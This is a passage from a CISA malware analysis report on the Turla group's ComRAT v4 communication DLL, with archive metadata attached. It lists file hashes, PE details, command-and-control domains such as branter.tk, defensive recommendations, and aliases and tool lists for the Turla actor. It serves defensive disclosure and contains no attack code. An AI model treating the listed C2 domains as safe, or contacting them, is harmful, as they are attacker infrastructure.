166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\nbranter.tk\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\nNo Whois record at the time of analysis.\r\nRelationships\r\nbranter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nbranter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nDescription\r\nComRAT v4 C2 domain.\r\n166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nTags\r\ntrojan\r\nDetails\r\nName Communication_module_64.dll\r\nSize 64000 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 54902e33dd6d642bc5530de33b19e43c\r\nSHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28\r\nSHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nSHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d27\r\nssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qM\r\nEntropy 5.939047\r\nAntivirus\r\nESET a variant of Win64/Turla.CN trojan\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-06 09:37:48-05:00\r\nImport Hash 87ab41c57e95562a3e81f0609398b278\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n199ab75383a70bd1148671ca1c689d0e header 1024 2.031353\r\n46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363\r\na97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592\r\nc5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435\r\nRelationships\r\n166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n166b1fb3d3... Connected_To bronerg.tk\r\n166b1fb3d3... Connected_To crusider.tk\r\n166b1fb3d3... Connected_To duke6.tk\r\n166b1fb3d3... Connected_To sanitar.ml\r\n166b1fb3d3... 
Connected_To wekanda.tk\r\n166b1fb3d3... Connected_To branter.tk\r\nDescription\r\nThis application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim's\r\nsystem default browser by \"ComRATv4.exe\"\r\n(44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit\r\ncommunication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).\r\nRelationship Summary\r\n1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\na3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8\r\na3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n44d6d67b53... Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\n44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642\r\n00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n00352afc7e... Connected_To branter.tk\r\n00352afc7e... Connected_To wekanda.tk\r\n00352afc7e... Connected_To sanitar.ml\r\n00352afc7e... Connected_To duke6.tk\r\n00352afc7e... Connected_To bronerg.tk\r\n00352afc7e... 
Connected_To crusider.tk\r\nbronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nbronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\ncrusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\ncrusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nduke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nsanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nsanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nwekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nwekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\nbranter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d\r\nbranter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405\r\n166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316\r\n166b1fb3d3... Connected_To bronerg.tk\r\n166b1fb3d3... Connected_To crusider.tk\r\n166b1fb3d3... Connected_To duke6.tk\r\n166b1fb3d3... Connected_To sanitar.ml\r\n166b1fb3d3... Connected_To wekanda.tk\r\n166b1fb3d3... Connected_To branter.tk\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. 
If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? 
A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Service Desk.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a"
	],
	"report_names": [
		"ar20-303a"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775441528,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.pdf",
		"text": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.txt",
		"img": "https://archive.orkl.eu/04f4526e7cb4d730d6539bf06453471f448d7063.jpg"
	}
}